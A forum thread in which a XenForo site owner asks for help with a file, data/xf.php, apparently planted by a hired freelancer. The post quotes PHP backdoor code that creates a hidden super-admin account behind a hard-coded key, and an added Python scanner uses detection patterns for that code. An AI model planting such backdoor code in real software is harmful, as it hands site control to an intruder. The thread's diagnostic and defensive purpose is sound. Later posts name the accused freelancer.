XF 2.2 xenforo developer may have added an exploit file

MR X

Active member
So I hired a dev on Fiverr to make me an addon. It took way too long to complete by the time frame, so I fired him, then some time later re-hired him to actually finish it. Garbage work was done, but apparently he may or may not have uploaded a file named xf.php in /home/domain-name/public_html/data/xf.php. This is not an official XenForo file, is it? Because within it is:

PHP:
if ($key == 'dfdasfasfsjd544fjjkl') {
    // Create a new user with random credentials
    $registration = \XF::service('XF:User\Registration');
    $input['username'] = $randomString;
    $input['email'] = "$randomString@gmail.com";
    $input['password'] = $randomString;
    $registration->setFromInput($input);
    $registration->skipEmailConfirmation(true);
    $user = $registration->save();

    // Force admin privileges
    $user->secondary_group_ids = [3, 8, 5];  // Elevated groups
    $admin = \XF::app()->em()->create('XF:Admin');
    $admin->user_id = $user->user_id;
    $input['is_super_admin'] = true;
    $form->basicEntitySave($admin, $input);
    $form->run();

    echo $randomString;  // Prints the generated credentials
}

That is just the gist of what was in it.

Appreciate some support, thank you.
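As an added example (not code from the original post or from XenForo itself), here is a defender-side check: a small Python scanner that flags PHP files sitting in XenForo upload directories and files that combine the indicators seen in the snippet above (hard-coded key gate, skipped email confirmation, direct admin entity creation, super-admin flag). It assumes a stock install where data/ and internal_data/ contain no PHP; the sample tree it builds is constructed and the planted file is inert text.

```python
import re
import tempfile
from pathlib import Path

# Upload-only directories in a stock XenForo install; no PHP should live here (assumption:
# check against your own install's file list). The thread's file was data/xf.php.
NO_PHP_DIRS = ("data", "internal_data")

# Indicators taken from the snippet in the first post: a hard-coded key gate, silent
# registration, and direct privilege escalation via the admin entity / super-admin flag.
SUSPICIOUS = {
    "hardcoded_key_gate": re.compile(r"\$\w+\s*==\s*['\"][A-Za-z0-9]{12,}['\"]"),
    "skip_email_confirmation": re.compile(r"skipEmailConfirmation\(\s*true\s*\)"),
    "admin_entity_create": re.compile(r"create\(\s*['\"]XF:Admin['\"]\s*\)"),
    "super_admin_flag": re.compile(r"is_super_admin"),
}

def scan_xenforo_root(root):
    """Return sorted (relative_path, reasons) for PHP files that are misplaced or look like backdoors."""
    root = Path(root)
    findings = []
    for path in root.rglob("*.php"):
        rel = path.relative_to(root)
        reasons = []
        if rel.parts[0] in NO_PHP_DIRS:
            reasons.append("php_in_upload_dir")
        hits = [n for n, rx in SUSPICIOUS.items() if rx.search(path.read_text(errors="replace"))]
        # One hit (e.g. is_super_admin) is normal in core code; two or more together is not.
        if len(hits) >= 2:
            reasons.append("backdoor_indicators:" + ",".join(sorted(hits)))
        if reasons:
            findings.append((rel.as_posix(), reasons))
    return sorted(findings)

def build_sample_install():
    """Constructed throwaway tree imitating the thread's layout; the planted file is inert text."""
    root = Path(tempfile.mkdtemp(prefix="xf_scan_"))
    (root / "src" / "XF").mkdir(parents=True)
    (root / "data").mkdir()
    # Benign core-style file: mentions is_super_admin once and lives where PHP belongs.
    (root / "src" / "XF" / "Admin.php").write_text("<?php\n// is_super_admin column definition\n")
    # Planted file modelled on the first post's snippet (placeholder key, no executable logic).
    (root / "data" / "xf.php").write_text(
        "<?php\nif ($key == 'PLACEHOLDERKEY12345') {\n"
        "  $registration->skipEmailConfirmation(true);\n"
        "  $admin = \\XF::app()->em()->create('XF:Admin');\n"
        "  $input['is_super_admin'] = true;\n}\n")
    return root
```

Run `scan_xenforo_root("/home/domain-name/public_html")` against a real install; anything reported under data/ or internal_data/ is worth comparing against a clean XenForo release of the same version.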
 
Is it your common practice to pay people (with free software, etc) to post a positive reviews on xenforo.com ?
The OP left a review for the small job that ForumSolution completed. The review was provided once the client was satisfied, just as ForumSolution mentioned.

I have also worked with forumsolution before and that I wrote my positive review of my own free will.
 
Let me explain the logic: we made a deal here on XenForo. I did some small work for him of course paid he was happy so then he gave me a review just like a normal client. I never forced him to write a review—why would I? I have no account on fiverr lol
My words came off wrong.

ForumSolution is not the same user and did not force me; xenbulletins (the bad actor) is the one that forced me to make a review.
 
Why don't you write a negative review on Fiverr explaining what he did and, most importantly, report him to Fiverr?
He's done something very serious and will do it to everyone! Both new and, especially, existing buyers need to be warned.
I did. I am waiting for the verdict before I make a review on it (if he doesn't get banned).
 
This is what an escalated support ticket staff member said:

Thank you for providing all the detailed evidence and for your continued patience as we work through this matter.

I’m Bo from Fiverr Customer Support, and I want to assure you that we take this situation very seriously. First, I’d like to acknowledge the frustration and concern this issue has caused, especially given the serious nature of the breach you’ve outlined.

From the information you’ve shared, it’s clear that the file found on your server (/data/xf.php) was a deliberate malicious backdoor, which is in violation of Fiverr's terms and compromises the trust clients place in our platform. The evidence, including the Apache logs, chat logs, and the malicious code, strongly suggests that this freelancer, Fahad Ashraf (also known as XenAddons and xenbulletins), is directly responsible for placing the backdoor and engaging in malicious behavior.

We will be closely reviewing the details you've provided, including the information about Fahad's previous ban from the XenForo marketplace, complaints from other clients, and the false claims regarding his identity. It's deeply concerning that he encouraged off-platform payments and misrepresented himself, which clearly violates Fiverr’s policies.

I want to assure you that we are investigating this thoroughly and will take appropriate action if we find violations of Fiverr's Terms of Service. This includes possible penalties for the freelancer and steps to ensure that no other Fiverr clients are exposed to similar risks in the future. Rest assured, this is a high-priority case, and we will escalate this to the relevant teams for further review.

As for your refund request, I do understand the circumstances here, but given that the order was marked as completed in September 2024, the typical cancellation policy may not apply. However, I will forward your request to the relevant team for further consideration and to determine if any exceptions can be made in this specific case.

In the meantime, please feel free to provide any additional information or clarification, and we will continue to support you as we move forward with this investigation.

Thank you again for bringing this matter to our attention. We are committed to ensuring the safety and integrity of Fiverr’s platform, and your feedback is invaluable in helping us maintain that standard.

Best regards,
 